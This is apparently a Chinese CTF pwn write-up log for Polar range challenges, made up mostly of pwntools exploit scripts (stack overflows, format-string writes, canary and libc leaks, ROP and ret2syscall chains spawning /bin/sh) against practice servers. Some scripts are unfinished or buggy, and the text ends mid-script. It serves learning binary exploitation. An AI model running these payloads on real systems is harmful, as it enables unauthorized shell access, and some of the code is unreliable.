这个靶场挺好的,比较基础

后缀未做出的我都会标记

后续会补上

Polar

overload1

2024.9.25

日常检查

就是一个常规的覆盖溢出

但是就是要记住gets函数溢出的栈的长度

ida反编译的不太对

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
 
from pwn import*
 
p=remote('120.46.59.242',  2102)
#p=process('./1111')




ret_addr=0x0000000000400661
pop_rdi=0x0000000000400973
bin_sh=0x000000400A3C
system_addr=0x04008FD 
p.sendafter('输入y/n',b'y')
p.recvuntil('\n')
##p.recv()
payload = b'a'*0x117
p.sendline(payload)
#p.sendline(payload)
p.interactive()

Easy_ShellCode

日常检查

1
2
3
4
5
6
7
8
9
10
bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/Easy_ShellCode$ checksec 1111
[*] '/home/bbq/桌面/啊布拉布拉/Polar/pwn/Easy_ShellCode/1111'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments
bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/Easy_ShellCode$

丢进ida里面看看

1
2
3
4
5
6
7
8
9
10
ssize_t Start()
{
  char buf[104]; // [esp+0h] [ebp-68h] BYREF

  init();
  write(1, "Please Input:\n", 0xEu);
  read(0, &str, 256u);
  puts("What,s your name ?:");
  return read(0, buf, 256u);
}

怎么说呢?

str在bss段上

buf在栈上

没有后门

在bss段上写shellcode?

在buf栈上执行??????

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import*
context(log_level= 'debug', arch = 'i386', os = 'linux' )

p=process('./1111')
p=remote('120.46.59.242', 2101)
str_addr=0x804A080
p.recvuntil('Please Input:\n')
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)



p.recvuntil('What,s your name ?:\n')
payload=b'a'*(0x68+4)+p32(str_addr)
p.sendline(payload)
p.interactive()

yes,是这样的

简单题是这样的

要是所有的都这样就好了

Easy_Text+Fmt

2024.9.25

1
2
3
4
5
6
7
8
bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/Easy_Text+Fmt$ checksec 1111
[*] '/home/bbq/桌面/啊布拉布拉/Polar/pwn/Easy_Text+Fmt/1111'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/Easy_Text+Fmt$

日常检查

丢进ida里面

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[104]; // [esp+Ch] [ebp-6Ch] BYREF

  init();
  puts("Please Input Your Lucky Number:");
  gets(s);
  printf(s);
  if ( x == 66 )
    Choice1();
  if ( y == 6710886 )
    Choice2();
  if ( d == 48 )
    Choice3();
  else
    printf("You don't know much about string formatting, so go ahead and learn!");
  return 0;
}

简单的格式化字符串,

简单的找一下偏移

偏移为7

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

p=process('./1111')

y_addr=0x804A038

payload=p32(y_addr)+p32(0x666666)+b'%$7n'


p.sendline(payload)


p.interactive()

操了

还有个后门啊

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
p= remote('120.46.59.242', 2126)
context(log_level='debug',arch='i386',os='linux')
d_addr=0x804A040
backdoor=0x80486B0
payload=p32(d_addr)+b'a'*(48-4)+b'%7$n'
#payload= payload = fmtstr_payload(7,{d_addr:0x30})
p.recv()
p.sendline(payload)
payload1=b'a'*(0x3a+4)+p32(backdoor)
p.recv()
p.sendline(payload1)
p.interactive()

###############################################################################
from pwn import *

p= remote('120.46.59.242', 2126)

context(log_level='debug',arch='i386',os='linux')
d_addr=0x804A040
backdoor=0x80486B0

payload=p32(d_addr)+b'a'*(48-4)+b'%7$n'
#payload= payload = fmtstr_payload(7,{d_addr:0x30})
p.recvuntil("Please Input Your Lucky Number:\n")
p.sendline(payload)

payload1=b'a'*(0x3a+4)+p32(backdoor)
p.recvuntil('Please Input:')

p.sendline(payload1)

p.interactive()

好题啊好题

小狗汪汪汪

2024.9.25

日常检查

1
2
3
4
5
6
7
8
9
bbq@ubuntu:~/桌面/pwn/小狗汪汪汪$ checksec 1111
[*] '/home/bbq/pwn/小狗汪汪汪/1111'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
bbq@ubuntu:~/桌面/啊布拉布拉/御宛杯(社会赛道)/pwn/小狗汪汪汪$

看着还行

ida里面看看

后门

1
2
3
4
5
6
7
from pwn import*
 
p=remote('120.46.59.242',2073)
#p=process('./1111')
payload = b'a'*(0x9+4)+p32(0x804859B)
p.sendline(payload)
p.interactive()

小猫喵喵喵

2024.8.25

日常检查

1
2
3
4
5
6
7
8
bbq@ubuntu:~小猫喵喵喵$ checksec 1111
[*] '/home/bbq//1111'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
bbq@ubuntu:~/桌面/啊布拉布拉/御宛杯(社会赛道)/pwn/小猫喵喵喵$

看着不难应该

自己写个shell吗?

套公式吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
#context.log_level = 'debug'
p = remote('120.46.59.242', 2142)
#p= process('./pwn')


offset = (0x6c+4)
system_addr = 0x8048480
buf2_addr = 0x804A080
gets_addr = 0x8048450
payload = b'a'*offset + p32(gets_addr) + p32(system_addr) + p32(buf2_addr) + p32(buf2_addr)
p.sendline(payload)
p.sendline("/bin/sh")
p.interactive()

歪日

这个get是用不了

我嘞个豆

看一眼wp,这个scanf是直接当gets用的

format_ret2libc

2024.9.25

1
2
3
4
5
6
7
8
bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/format_ret2libc$ checksec 1111
[*] '/home/bbq/桌面/啊布拉布拉/Polar/pwn/format_ret2libc/1111'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/format_ret2libc$

日常检查

盲猜一手

格式化字符串泄露canary地址

然后找libc基址

canary有一个,基址有一个

先找一手偏移

1
2
3
4
5
6
bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/format_ret2libc$ ./1111
Nice to meet you!
Say some words:
aaaaaaaa_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p
aaaaaaaa_0x7ffd68abfb20_0x80_0x7f40387d11f2_0x12_0x7f40388d9d60_0x6161616161616161_0x255f70255f70255f_0x5f70255f70255f70_0x70255f70255f7025_0x255f70255f70255f_0x5f70255f70255f70_0x70255f70255f7025_0x255f70255f70255f_0x5f70255f70255f70_0x980000a7025_0x98000000980_0x7f4038751e8d_(nil)_0x7f40388b06a0_0x1_0x7f40388b0723_0xd68
What's your name?

偏移为6

然后就是看一下canary的位置

1
2
3
4
5
6
7
8
.text:0000000000400888                 mov     rax, [rbp+var_8]
.text:000000000040088C                 xor     rax, fs:28h

;-0000000000000070
;-0000000000000070 buf             db 104 dup(?)
;-0000000000000008 var_8           dq ?
;+0000000000000000  s              db 8 dup(?)
;+0000000000000008  r

在rbp上面8位

1
2
3
4
5
+-----------------+
|      canary     |
+-----------------+
|       rbp       |
+-----------------+

看一下主函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
int __fastcall main(int argc, const char **argv, const char **envp)
{
  init(argc, argv, envp);
  puts("Nice to meet you!");
  secret();
  SetString();
  return 0;
}

__int64 secret()
{
  char buf[264]; // [rsp+0h] [rbp-110h] BYREF
  unsigned __int64 v2; // [rsp+108h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Say some words:");
  read(0, buf, 0x80uLL);
  printf(buf);
  return 0LL;
}

unsigned __int64 SetString()
{
  char buf[104]; // [rsp+0h] [rbp-70h] BYREF
  unsigned __int64 v2; // [rsp+68h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("What's your name?");
  read(0, buf, 0x100uLL);
  return __readfsqword(0x28u) ^ v2;
}

大概也知道了

第一次read函数进行泄露canary地址

第二次泄露进行泄露puts函数的基址

首先泄露canary地址吧

接收一下

1
2
3
4
5
gdb 111
b *printf
c
aaaa_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p
stack 50

image-20240930144020354

可以看见

1
2
0xddc8-0xdcc0=0x108
0x108/4=33

可以看见偏移为33

33加上6总共为39

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *


p=process('./1111')
elf=ELF('./1111')

payload='%39$p'
p.sendline(payload)

r.recvuntil('0x')
canary = int(r.recv(16),16)
#把canary接上
p.interactive()

后面接着puts函数进行泄露libc版本就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *


p=remote('120.46.59.242',2140)
#p=process('./1111')
elf=ELF('./1111')
libc=ELF('./')
payload='%39$p'
p.sendline(payload)
p.recvuntil('0x')
canary = int(p.recv(16),16)
#把canary接上
#p.interactive()

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x00000000040084B
pop_rdi =0x0000000000400943
ret_addr=0x00000000004005d9
#attack1

p.recvuntil('name?\n')
payload = b'a'*(0x70-8)+p64(canary)+p64(0xdeadbeef)+p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendline(payload)
#p.recvuntil('\n')
puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))

#文件库
#libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.sym["puts"]
print(hex(libc_base))
system_addr = libc_base+libc.sym["system"]
bin_sh = libc_base+libc.search(b"/bin/sh\x00").__next__()

#attack2
p.recvuntil('name?\n')
payload = b'a'*(0x70-8)+p64(canary)+b'a'*8+p64(0xdeadbeef)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)
p.sendline(payload)
p.interactive()

libc版本一直试不对

so,本来都想放弃了

但是想起来有个onegadget来着

就试了试成了

脚本试AI改的

1
one_gadget ./libc6_2.23-0ubuntu11.2_amd64.so
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *

# 远程连接
p = remote('120.46.59.242', 2140)
elf = ELF('./1111')
libc = ELF('./libc6_2.23-0ubuntu11.2_amd64.so')

# 泄露 canary
payload = '%39$p'
p.sendline(payload)
p.recvuntil('0x')
canary = int(p.recv(16), 16)

# 泄露 puts 地址
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x00000000040084B
pop_rdi = 0x0000000000400943
ret_addr = 0x00000000004005d9

p.recvuntil('name?\n')
payload = b'a'*(0x70-8) + p64(canary) + p64(0xdeadbeef) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendline(payload)
puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
print(f"[+] puts address: {hex(puts_addr)}")

# 计算 libc 基址
libc_base = puts_addr - libc.sym["puts"]
#print(f"[+] libc base: {hex(libc_base)}")

# 使用 onegadget 替换 system
# 这里你需要将 `0xXXXXXXXX` 替换为 `onegadget` 的输出地址
onegadget_addr = libc_base + 0x4527a  # 通过 onegadget 工具得到

# 第二次攻击:利用 onegadget 执行 /bin/sh
p.recvuntil('name?\n')
payload = b'a'*(0x70-8) + p64(canary) + b'a'*8 + p64(ret_addr) + p64(onegadget_addr)
p.sendline(payload)
p.interactive()

最终得到flag

没人能拒绝猫猫

日常检查

1
2
3
4
5
6
7
8
bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/没人能拒绝猫猫$ checksec cat
[*] '/home/bbq/桌面/啊布拉布拉/Polar/pwn/没人能拒绝猫猫/cat'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/没人能拒绝猫猫$

开了 个canary

丢进ida里面看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char buf[32]; // [rsp+0h] [rbp-50h] BYREF
  __int64 s2[6]; // [rsp+20h] [rbp-30h] BYREF

  s2[5] = __readfsqword(0x28u);
  init(argc, argv, envp);
  puts("                      __     __,");
  puts("                      \\,`~\"~` /");
  puts("      .-=-.           /    . .\\");
  puts("     / .-. \\          {  =    Y}=");
  puts("    (_/   \\ \\          \\      / ");
  puts("           \\ \\        _/`'`'`b");
  puts("             `.__.-'`        -._");
  puts("             |            '.__ `'-;_");
  puts("             |            _.' `'-.__)");
  puts("              \\    ;_..--'/     //  ");
  puts("              |   /  /   |     //    |     shawroot.cc");
  puts("              \\  \\ __)      //    /");
  puts("               \\__)        './/   .'");
  puts("                             `'-'`");
  s2[0] = 'tacetah';
  puts("Do you love cat? (lovecat/hatecat)");
  read(0, buf, 0x28uLL);
  if ( !strcmp("lovecat", s2) )
  {
    puts("Nice choice!\n");
    system("/bin/sh");
  }
  else
  {
    puts("Everyone have their own choice.\n");
    puts("My choice is you have no flag^^");
  }
  return 0;
}

简单看一下s2也在栈上

一个简单的覆盖

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

from pwn import*
#p=process('./1111')
p=remote('120.46.59.242',2051)
elf=ELF('./1111')
#gdb.attach(p)

payload = b'a'*(0x20)+b'lovecat\x00'

p.sendline(payload)

#pause
p.interactive()


'''
from pwn import *
#r = remote('120.46.59.242',2106)


payload = b'a'*(0x50-0x30)+b'lovecat\x00'
r.sendline(payload)
r.interactive()
'''

sandbox

一个简单的沙箱,

1
$0绕过

easypwn2

1
2
3
4
5
6
7
8
bbq@ubuntu:~$ checksec easypwn
[*] '/home/bbq/easypwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
bbq@ubuntu:~$

ida看一眼,满足条件就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  init(argc, argv, envp);
  puts("**********************************");
  puts("*     Welcome to the 504sys!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("**********************************");
  __isoc99_scanf("%16s", s);
  if ( strchr(s, 45) )
    return 0;
  if ( atoi(s) < 0 )
    vuln();
  return 0;
}

找一下atoi函数的漏洞。

image-20241101205123736

what’s your name

2024.11.2

还是比较简单的

应该只是一个覆盖问题

1
2
3
4
5
6
7
8
9
10
11
12
int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  puts("Hey!What's this?!");
  read(0, &b, 0x14u);
  puts(c);
  if ( !strcmp(c, "tznb") )
    system("cat ./flag");
  return 0;
}

image-20241102110109905

1
2
3
4
5
6
llq@llq-virtual-machine:~$ ./pwn2
Hey!What's this?!
aaaaabbbb
abbbb

llq@llq-virtual-machine:~$

应该还有个小段序的问题,这里直接搓脚本吧

1
2
3
4
5
6
7
8
9
from pwn import *

p=remote("1.95.36.136", 2118)

paylaod=b'aaaa'+b'tznb\x00\x00\x00\x00'
#有没有空字符都无所谓
p.send(paylaod)

p.interactive()

getshell

2024.11.2

1
2
3
4
5
6
7
8
9
10
11
llq@llq-virtual-machine:~$ checksec pwn2
[*] '/home/llq/pwn2'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
llq@llq-virtual-machine:~$

有后门说是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int16 v4[2]; // [rsp+0h] [rbp-70h] BYREF
  int v5; // [rsp+4h] [rbp-6Ch]
  _BYTE v6[88]; // [rsp+8h] [rbp-68h] BYREF
  int v7; // [rsp+60h] [rbp-10h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  v4[0] = 0;
  v4[1] = 0;
  v5 = 0;
  memset(v6, 0, sizeof(v6));
  v7 = 0;
  printf("%p\n", v4);
  gets(v4);
  return 0;
}

啥意思呢?

直接打了栈的地址?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *
#context.log_level = 'debug'
#p = remote('pwn.challenge.ctf.show', 28146)
p=process('./pwn2')
offset = (0x70+8)
system_addr = 0x000000000400560
gets_addr = 0x000000000400590
rdi_addr = 0x0000000000400803
ret_addr = 0x0000000000400549
buf2_addr = 0x000000000601060
payload = b'a'*offset + p64(rdi_addr) + p64(buf2_addr) + p64(gets_addr) + p64(rdi_addr) + p64(buf2_addr) +  p64(system_addr)
p.recv()
p.sendline(payload)
p.sendline("/bin/sh")
p.interactive()

应该不是这样做的吧

谁道呢?

Game-找不到libc版本

2024.11.2

嘶!

1
2
3
4
5
6
7
8
9
llq@llq-virtual-machine:~$ checksec 1111
[*] '/home/llq/1111'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No
llq@llq-virtual-machine:~$

看着还是挺正常的

漏洞gets函数

前面有几个绕过

但是没有后门??

傻逼了,泄露libc基址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
context(os='linux',arch='i386',log_level='debug')   
#context(os='linux',arch='amd64',log_level='debug')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so')
#libc=ELF('./libc6-i386_2.23-0ubuntu11.2_amd64.so')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./1111')
p=remote('1.95.36.136', 2053)
#p = process('./1111')
 
sla('game?',b'yes')
sla('learning?\n',b'yes')
rl('as you!\n') 

payload=b'a'*(0x6c+4)+p32(elf.plt['puts']) + p32(0x80485F4) + p32(elf.got['puts'])
sl(payload)
puts_addr=get_addr32()
pr(hex(puts_addr))


'''
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
pr(hex(libc_base)) 
'''

libc_base=get_addr32()-libc.sym['puts']
pr(hex(libc_base)) 


'''
system_addr = libc_base+libc.sym["system"]
bin_sh = libc_base+libc.search(b"/bin/sh\x00").__next__()

#attack2
#sla('game?',b'yes')
#sla('learning?\n',b'yes')
#rl('as you!\n')
payload = flat([b'A'*(0x6c+4),system_addr,b'AAAA',bin_sh])
sl(payload)
'''


inter()

找不到libc版本,就这样吧

test_format

ida打开

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
unsigned int Input()
{
  char buf[100]; // [esp+8h] [ebp-70h] BYREF
  unsigned int v2; // [esp+6Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  memset(buf, 0, sizeof(buf));
  puts("What's your name?");
  read(0, buf, 0x50u);
  printf(buf);
  if ( n == 4 )
    Shell();
  else
    puts("Bye~");
  return __readgsdword(0x14u) ^ v2;
}

格式化字符串,确定一下偏移就行

1
2
3
4
5
llq@llq-virtual-machine:~$ ./test_format 
What's your name?
aaaa_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p
aaaa_0xff934698_0x50_0xea47c576_0xea62ada0_(nil)_0x61616161_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_Bye~
llq@llq-virtual-machine:~$

看见偏移为6也是拿下了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
context(os='linux',arch='i386',log_level='debug')   
#context(os='linux',arch='amd64',log_level='debug')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so')
#libc=ELF('./libc6-i386_2.23-0ubuntu11.2_amd64.so')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./test_format')
#p=remote('1.95.36.136', 2053)
p = process('./test_format')

n=0x804A030
payload=p32(n)+"%6$n"
s(payload)

inter()

wsfw

03ret2syscall_32

1
2
3
4
5
6
7
8
9
10
11
12
llq@llq-virtual-machine:~$ checksec 1111
[*] '/home/llq/1111'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x8048000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
llq@llq-virtual-machine:~$

这会包是ret2syscall了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
context(os='linux',arch='i386',log_level='debug')   
#context(os='linux',arch='amd64',log_level='debug')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so')
#libc=ELF('./libc6-i386_2.23-0ubuntu11.2_amd64.so')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./')
#p=remote('1.95.36.136', 2053)
p = process('./')

pop_eax = 0x080b8576 
pop_edx_ecx_ebx = 0x0806f250
bss = 0x80EBB80
int_0x80 = 0x0806cea3


edx_ecx_ebx_pop = 0x0806f250
sh_pop = 0x80EA068
Ret_syscall = 0x08062d2d
payload = b"a"*(0x208+4)
payload += p32(pop_eax)+p32(0x0b)
payload += p32(edx_ecx_ebx_pop)+p32(0x0)+p32(0x0)+p32(sh_pop)
payload += p32(ret_syscall)
sl(payload)
#sh.interactive()
inter()

有bin/sh哇

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
context(os='linux',arch='i386',log_level='debug')   
#context(os='linux',arch='amd64',log_level='debug')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so')
#libc=ELF('./libc6-i386_2.23-0ubuntu11.2_amd64.so')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./1111')
p=remote('1.95.36.136', 2104)
#p = process('./1111')

pop_eax = 0x080b8576 
pop_edx_ecx_ebx = 0x0806f250
#bss = 0x80EBB80
int_0x80 = 0x0806cea3


edx_ecx_ebx_pop = 0x0806f250
sh_pop = 0x80EA068
#ret_syscall = 0x08062d2d


payload = b"a"*(0x208+4)
payload += p32(pop_eax)+p32(0x0b)
payload += p32(edx_ecx_ebx_pop)+p32(0x0)+p32(0x0)+p32(sh_pop)
payload += p32(int_0x80)
sl(payload)
#sh.interactive()
inter()

easyrop

ida看一眼

有system函数和sh

大概是64位ROP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
